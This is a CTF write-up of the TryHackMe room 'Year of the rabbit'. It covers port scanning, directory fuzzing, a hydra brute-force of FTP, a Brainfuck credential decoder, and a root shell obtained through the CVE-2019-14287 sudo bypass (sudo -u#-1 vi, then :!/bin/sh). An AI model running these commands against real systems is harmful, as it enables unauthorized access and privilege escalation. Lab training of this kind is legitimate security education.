Year of the rabbit
In this post we will look into the room "Year of the rabbit" from TryHackMe, which can be found at https://tryhackme.com
So as always let’s start with some port scanning:
nmap -sV -A $IP
-A – aggressive scan: turns on OS detection, version detection, the default NSE scripts and traceroute in one go, so you quickly get a picture of what is worth digging into and what is not.
-sV – version detection: identifies the software and version behind each open port, which is what you search for known exploits against.
Now let’s see the output:
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-09 03:41 EDT
Nmap scan report for 10.10.250.190
Host is up (0.059s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.2
22/tcp open  ssh     OpenSSH 6.7p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
|   1024 a0:8b:6b:78:09:39:03:32:ea:52:4c:20:3e:82:ad:60 (DSA)
|   2048 df:25:d0:47:1f:37:d9:18:81:87:38:76:30:92:65:1f (RSA)
|   256 be:9f:4f:01:4a:44:c8:ad:f5:03:cb:00:ac:8f:49:44 (ECDSA)
|_  256 db:b1:c1:b9:cd:8c:9d:60:4f:f1:98:e2:99:fe:08:03 (ED25519)
80/tcp open  http    Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Apache2 Debian Default Page: It works
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.72 seconds
Anonymous FTP login isn't allowed, so we enumerate the web server next. We fire up gobuster with the following command:
gobuster dir -u $IP -w /usr/share/wordlists/dirb/common.txt
dir – sets the mode to directory/file discovery
-u – the target URL
-w – the path to the wordlist
Now we wait for gobuster to finish fuzzing the web server and then check the output:
2020/08/09 03:44:16 Starting gobuster
===============================================================
/.htpasswd (Status: 403)
/.hta (Status: 403)
/assets (Status: 301)
/.htaccess (Status: 403)
/index.html (Status: 200)
/server-status (Status: 403)
===============================================================
2020/08/09 03:44:44 Finished
===============================================================
No interesting directories, so I went through all of them manually just to see. In /assets I found two interesting things:
The first one is the popular meme song "Never Gonna Give You Up", but style.css is the interesting part of this directory. When we open the file we see a telling comment:
/* Nice to see someone checking the stylesheets. Take a look at the page: /**************.php */
When I opened the page I was redirected to YouTube, so I fired up Burp to see what the PHP file actually does before the redirect. For Burp we first need to set the proxy in Firefox. This is done in Preferences > General (scroll to the bottom) > Network Settings > Advanced; point the HTTP proxy at Burp's listener (127.0.0.1 on port 8080 by default) and fill in this information:
Then press OK and open Burp with intercept turned on. Now browse to the PHP page again. Burp holds each request before it is sent, so the hop through intermediary.php shows up with its hidden_directory parameter instead of vanishing behind the redirect to YouTube:
GET /intermediary.php?hidden_directory=/******** HTTP/1.1
Host: 10.10.250.190
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
DNT: 1
You can then switch Firefox back to "No proxy" and browse to the hidden directory. We see a PNG file that we can download from the web server. We use the command:
Now let's run strings on the image. We type:
And BOOM, we can see there is a hidden message:
Eh, you've earned this. Username for FTP is ftpuser One of these is the password:
Then we can redirect the output into a file so we can use hydra to brute-force the FTP login:
strings Hot_Babe.png > pass.txt
We open pass.txt with mousepad and delete everything except the candidate passwords, so hydra only tries those. Then we run hydra with the following command:
hydra -l ftpuser -P pass.txt ftp://$IP
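The manual mousepad edit above can be scripted. The following is an added example for this writeup, not the author's own code: it reads the strings output, keeps only the lines after the "One of these is the password:" marker, deduplicates them and writes a wordlist in the one-per-line format hydra -P expects. The sample strings output embedded below is constructed for the example (the three passwords are made up), and the script assumes the candidate list runs from the marker to the end of the output, which is how the hidden message in the image is laid out.

```python
"""Pull the candidate passwords out of `strings` output for hydra.

Added example for this writeup (not the author's code). It assumes the
list of candidates starts on the line after the marker
"One of these is the password:" and runs to the end of the strings output.
"""
import sys

MARKER = "One of these is the password:"


def extract_candidates(strings_output: str) -> list:
    """Return the distinct non-empty lines that follow MARKER, in order."""
    lines = strings_output.splitlines()
    start = None
    for i, line in enumerate(lines):
        if MARKER in line:
            start = i + 1
            break
    if start is None:
        return []  # marker absent: nothing to brute-force with
    seen = set()
    candidates = []
    for line in lines[start:]:
        word = line.strip()
        # Skip blanks and duplicates; each duplicate would cost hydra a login attempt.
        if word and word not in seen:
            seen.add(word)
            candidates.append(word)
    return candidates


def write_wordlist(candidates, path="pass.txt") -> str:
    """Write one candidate per line, the format hydra -P expects."""
    with open(path, "w") as fh:
        fh.write("\n".join(candidates) + "\n")
    return path


# Constructed stand-in for `strings Hot_Babe.png`: the chunk names are what
# strings typically shows for a PNG, and the three passwords are made up.
SAMPLE = """IHDR
sRGB
Eh, you've earned this.
Username for FTP is ftpuser
One of these is the password:
Mou+56n%QK8sr
1mHUWBzm#rR
sHI33tANOLxN
"""

if __name__ == "__main__":
    # Usage: strings Hot_Babe.png > raw.txt && python3 extract_pass.py raw.txt
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE
    words = extract_candidates(text)
    print(f"{len(words)} candidates written to {write_wordlist(words)}")
```

Run it on the real strings output and feed the resulting pass.txt to the hydra command above; with a list this short, hydra finishes in seconds and the default 16 parallel tasks are more than enough.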
And voilà, we got the password, so now we can log in. We see a file named Eli's_Creds.txt that we can download with the "get" command followed by the filename. When I used cat to view the file I was amazed by this (I'm pasting part of the content of the file):
+++++ ++++[ ->+++ +++++ +<]>+ +++.< +++++ [->++ +++<] >++++ +.<++ +[->- --<]> ----- .<+++ [->++ +<]>+ +++.< +++++ ++[-> ----- --<]> ----- --.<+ ++++[ ->--- --<]> -.<++ +++++ +[->+ +++++ ++<]> +++++ .++++ +++.- --.<+ +++++ +++[- >---- ----- <]>-- ----- ----. ---.< +++++ +++[- >++++ ++++< ]>+++ +++.< ++++[ ->+++ +<]>+ .<+++ +[->+ +++<] >++.. ++++. ----- ---.+
I pasted it into Google and found that this is the Brainfuck language. I used a website to decode it and BOOM, we have a username and password. A local interpreter does the same job without handing someone's credentials to a third-party site. Now we can use this info for SSH.
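To decode the file locally, here is a small Brainfuck interpreter, added for this writeup and not part of the original post. It ignores everything that is not one of the eight Brainfuck commands, so the spaced-out layout of Eli's_Creds.txt can be fed in as-is. The fragment quoted above is embedded as sample input; since the post only pastes part of the file, the decoded output stops mid-password. The script assumes the usual 30,000-cell tape of wrapping 8-bit cells and treats the input command "," as storing 0, which is enough for a message that only prints.

```python
"""Minimal Brainfuck interpreter, added example for decoding Eli's_Creds.txt offline.

Not code from the original writeup. Assumes a 30,000-cell tape of unsigned
bytes (wrapping at 256) and no real stdin: the "," command stores 0.
"""


def run_brainfuck(program: str, tape_size: int = 30000) -> str:
    """Execute a Brainfuck program and return everything it printed."""
    code = [c for c in program if c in "<>+-.,[]"]  # drop spaces and other noise

    # Pre-compute matching bracket positions so each jump is O(1).
    jump = {}
    stack = []
    for pos, c in enumerate(code):
        if c == "[":
            stack.append(pos)
        elif c == "]":
            if not stack:
                raise ValueError(f"unmatched ']' at command {pos}")
            open_pos = stack.pop()
            jump[open_pos] = pos
            jump[pos] = open_pos
    if stack:
        raise ValueError(f"unmatched '[' at command {stack[-1]}")

    tape = bytearray(tape_size)
    ptr = 0
    pc = 0
    out = []
    while pc < len(code):
        c = code[pc]
        if c == ">":
            ptr += 1
        elif c == "<":
            ptr -= 1
        elif c == "+":
            tape[ptr] = (tape[ptr] + 1) % 256
        elif c == "-":
            tape[ptr] = (tape[ptr] - 1) % 256
        elif c == ".":
            out.append(chr(tape[ptr]))
        elif c == ",":
            tape[ptr] = 0  # no input source wired up; see module docstring
        elif c == "[" and tape[ptr] == 0:
            pc = jump[pc]  # skip the loop body
        elif c == "]" and tape[ptr] != 0:
            pc = jump[pc]  # back to the matching '['
        if not 0 <= ptr < tape_size:
            raise IndexError(f"tape pointer left the tape at command {pc}")
        pc += 1
    return "".join(out)


# The fragment of Eli's_Creds.txt quoted in the writeup above, copied as
# printed there (truncated, so the decoded password is cut off as well).
ELI_FRAGMENT = (
    "+++++ ++++[ ->+++ +++++ +<]>+ +++.< +++++ [->++ +++<] >++++ +.<++ +[->- "
    "--<]> ----- .<+++ [->++ +<]>+ +++.< +++++ ++[-> ----- --<]> ----- --.<+ "
    "++++[ ->--- --<]> -.<++ +++++ +[->+ +++++ ++<]> +++++ .++++ +++.- --.<+ "
    "+++++ +++[- >---- ----- <]>-- ----- ----. ---.< +++++ +++[- >++++ ++++< "
    "]>+++ +++.< ++++[ ->+++ +<]>+ .<+++ +[->+ +++<] >++.. ++++. ----- ---.+"
)

if __name__ == "__main__":
    import sys

    # Usage: python3 bf.py Eli\'s_Creds.txt   (no argument decodes the fragment)
    src = open(sys.argv[1]).read() if len(sys.argv) > 1 else ELI_FRAGMENT
    print(repr(run_brainfuck(src)))
```

Run against the full file it prints the username on one line and the password on the next; the fragment above stops after the first letters of the password, and the output uses CRLF line endings, which is why repr() is used to show them.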
Once logged in we see a message from gwendoline about a s3cr3t directory. We can use the "locate" command to find it:
locate s3cr3t
#output
/usr/games/s3cr3t
/usr/games/s3cr3t/.th1s_m3ss4ag3_15_f0r_gw3nd0l1n3_0nly!
/var/www/html/sup3r_s3cr3t_fl4g.php
Now we can cat the secret message. It contains gwendoline's password, which we can use to SSH in as her. Then we can cat the user.txt flag and submit it to TryHackMe.
For root I tried sudo -l to see what we can run, and it showed that vi can be run through sudo, but the GTFOBins commands didn't work with that rule. Then I found a sudo bug: if you specify a user ID that doesn't exist, sudo runs the command as root. This is CVE-2019-14287, which affects sudo versions before 1.8.28 (check with sudo -V). It only matters for rules that let you run a command as any user except root (a Runas spec like (ALL, !root)), which is exactly the case the GTFOBins vi entry cannot handle. Passing the user ID -1 (or its unsigned form, 4294967295) gets past the !root check because it matches neither uid 0 nor the name root, but the setresuid() call sudo then makes with uid -1 means "leave the uid unchanged", and sudo is already running as root at that point, so the command runs as root. The -u#<uid> syntax is how sudo takes a numeric user ID. We type:
sudo -u#-1 /usr/bin/vi /home/gwendoline/user.txt
Vi opens; press ":" and type "!/bin/sh", and the shell it drops you into is running as root. Now we can cat the root.txt file.